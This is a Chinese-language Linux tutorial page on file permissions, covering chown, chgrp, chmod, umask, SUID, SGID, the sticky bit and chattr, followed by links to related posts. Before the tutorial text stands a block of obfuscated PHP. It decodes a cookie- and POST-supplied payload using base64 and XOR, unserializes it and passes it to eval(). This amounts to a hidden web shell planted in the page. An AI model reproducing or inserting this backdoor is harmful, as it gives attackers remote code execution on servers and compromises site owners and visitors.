$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 文件权限 | Linux运维部落

文件权限

文件权限

文件属性


      rw-r–r–表示文件权限

    Root 表示文件所有者

    Root 表示文件所属组

    0 表示文件的大小

    Jul 26 11:09 2016-07-26 创建时间

    . log 表示文件名

 

文件属性操作

     Chown 设置文件的所有者

     Chgrp 设置文件的属组

     修改文件的属主:chown

         chown [OPTION]… [OWNER][:[GROUP]] FILE…

     用法:

         OWNER

         OWNER:GROUP

         :GROUP

     命令中的冒号可用.替换;

         -R: 递归 chown [OPTION]… –reference=RFILE FILE… v

     修改文件的属组:chgrp

         chgrp [OPTION]… GROUP FILE…

         chgrp [OPTION]… –reference=RFILE FILE…

         -R 递归

 

 

文件权限

v  文件的权限主要针对三类对象进行定义:

        owner: 属主, u

        group: 属组, g

        other: 其他, o v

    每个文件针对每类访问者都定义了三种权限:

        r: Readable

        w: Writable

        x: eXcutable

    文件权限

v  文件:

        r: 可使用文件查看类工具获取其内容

        w: 可修改其内容

        x: 可以把此文件提请内核启动为一个进程 v

    目录:

        r: 可以使用ls查看此目录中文件列表

       w: 可在此目录中创建文件,也可删除此目录中的文件

        x: 可以使用ls -l查看此目录中文件列表,可以cd进入此

    目录

        X:只给目录x权限,不给文件x权限

    修改文件权限

v      chmod [OPTION]… OCTAL-MODE FILE…

        -R: 递归修改权限 v

        chmod [OPTION]… MODE[,MODE]… FILE…

    MODE:

        修改一类用户的所有权限:

         u=  g= o= ug=  a= u=,g=

        修改一类用户某位或某些位权限

         u+  u- g+ g- o+ o- a+ a- + v

        chmod [OPTION]… –reference=RFILE FILE…

    参考RFILE文件的权限,将FILE的修改为同RFILE;


权限设置

v  chgrp  sales testfile v

    chown  root:admins  testfile

v  chmod  u+wx,g-r,o=rx file v

    chmod  -R g+rwX /testdir

v  chmod  600  file v

    chown mage testfile

新建文件和目录的默认权限

v  umask值 可以用来保留在创建文件权限 v

    新建FILE权限: 666-umask

    如果所得结果某位存在执行(奇数)权限,则将其权限+1 v

    新建DIR权限: 777-umask v

    非特权用户umask是 002 v

    root的umask 是 022 v

    umask: 查看 v

    umask #: 设定 v

    umask 002 v

    umask –S 模式方式显示 v

    umask –p 输出可被调用 v

    全局设置: /etc/bashrc 用户设置:~/.bashrc

 

Linux文件系统上的特殊权限 

v  SUID, SGID, Sticky v

    三种常用权限:r, w, x    user, group, other v

    安全上下文 v

    前提:进程有属主和属组;文件有属主和属组

(1)  任何一个可执行程序文件能不能启动为进程:取决发起者 对程序文件是否拥有执行权限

(2) 启动为进程之后,其进程的属主为发起者;进程的属组为 发起者所属的组

(3) 进程访问文件时的权限,取决于进程的发起者

    (a) 进程的发起者,同文件的属主:则应用文件属主权限

    (b) 进程的发起者,属于文件属组;则应用文件属组权限

    (c) 应用文件“其它”权限

 

可执行文件上SUID权限

v  任何一个可执行程序文件能不能启动为进程:取决发起者对 程序文件是否拥有执行权限 v

    启动为进程之后,其进程的属主为原程序文件的属主 v

    SUID只对二进制可执行程序有效 v

    SUID设置在目录上无意义 v

    权限设定:

        chmod u+s FILE…

        chmod u-s FILE…

文件权限 

可执行文件上SGID权限

v  任何一个可执行程序文件能不能启动为进程:取决发起者对 程序文件是否拥有执行权限 v

启动为进程之后,其进程的属主为原程序文件的属组 v

 权限设定:

chmod g+s FILE…

chmod g-s FILE…

 

 

目录上的SGID权限

v  默认情况下,用户创建文件时,其属组为此用户所属的主组 v

一旦某目录被设定了SGID,则对此目录有写权限的用户在此 目录中创建的文件所属的组为此目录的属组 v

通常用于创建一个协作目录 v

权限设定:

chmod g+s DIR…  chmod g-s DIR…

 

Sticky 位

v具有写权限的目录通常用户可以删除该目录中的任何 文件,无论该文件的权限或拥有权 v

  在目录设置Sticky 位,只有文件的所有者或root可 以删除该文件 v

  sticky 设置在文件上无意义 v

  权限设定:

  chmod o+t DIR…     chmod o-t DIR…

v例如: Ü ls -ld /tmp drwxrwxrwt 12 root root 4096 Nov 2 15:44 /tmp

 

权限位映射

v  SUID: user,占据属主的执行权限位

     s: 属主拥有x权限

     S:属主没有x权限 v

SGID: group,占据属组的执行权限位

     s: group拥有x权限

     S:group没有x权限 v

Sticky: other,占据other的执行权限位

     t: other拥有x权限

     T:other没有x权限

 

设定文件特定属性

v   chattr +i 不能删除,改名,更改

v   chattr +a 只能增加 v

     lsattr 显示特定属性

 

原创文章,作者:xiaoqiang512,如若转载,请注明出处:http://www.178linux.com/31739

(0)
上一篇 2016-08-11 09:37
下一篇 2016-08-11 09:37

相关推荐

  • N22第八周作业

    1. 请描述网桥、集线器、二层交换机、三层交换机、路由器的功能、使用场景与区别。 网桥从一个局域网接收MAC帧,拆封、校对、校验之后,按另一个局域网的格式重新组装,发往它的物理层。由于网桥是链路层设备,因此不处理数据链路层以上层次协议所加的报头。   集线器的主要功能是对接收到的信号进行再生整形放大,以扩大网络的传输距离,同时把…

    Linux干货 2016-12-26
  • web 服务进阶 httpd配置成https

    web服务进阶 自建CA/https详解 一、SSL与https 1、引言 我们网上购物、网上订票,以及使用支付宝支付过程中都会在网上直接输入账号和密码。这些信息都是非常重要的,如何才能在输入的过程中,不被别人看见和窃取,就需要对你输入的信息进行加密处理。 早期的两主机通信之间是没有加解密程序,后来就在传输层与应用层之间加了一个SSL库,完成加密解密功能。 …

    Linux干货 2016-12-11
  • 网络N22期-第二周作业

    1、Linux上的文件管理类命令都有哪些,其常用的使用方法及其相关示例演示。 常用文件管理类命令有cp、mv、rm。 # cp命令:文件复制命令     cp [OPTION]… [-T] SOURCE DEST 单文件复制     cp [OPTION]… SOURC…

    Linux干货 2016-08-22
  • PXE实践

    本篇只以记录个人部署pxe过程中所遇问题,至于原理,只做部分简单说明。 pxe部署必要软件: syslinux (用于提供引导中所必备文件) tftp(用于提供存放vmlinuz,initrd,syslinux.0等引导类文件) dhcp(用于自动获取IP包括指明去哪个主机获取syslinux.0文件) 最后还需要一个web或者ftp服务,已提供系统安装中所…

    Linux干货 2017-02-05
  • DHCP简单阐述及配置实现方法

    DHCP是什么…… DHCP是Dynamic Host Configuration Protocol的缩写,它是TCP/IP协议簇中的一种,主要是用来给网络客户机分配动态的IP地址。 其主要功能是: 用于内部网络或网络服务供应商自动分配IP地址给用户 用于内部网络管理员作为对所有电脑作中央管理的手段 直接点就是,这些被…

    Linux干货 2016-12-05
  • 网络21期第十周博客作业

    1、请详细描述CentOS系统的启动流程(详细到每个过程系统做了哪些事情) Centos6启动流程:       POST加电自检 —> BOOT Sequence —> 加载内核启动系统    &n…

    Linux干货 2016-09-15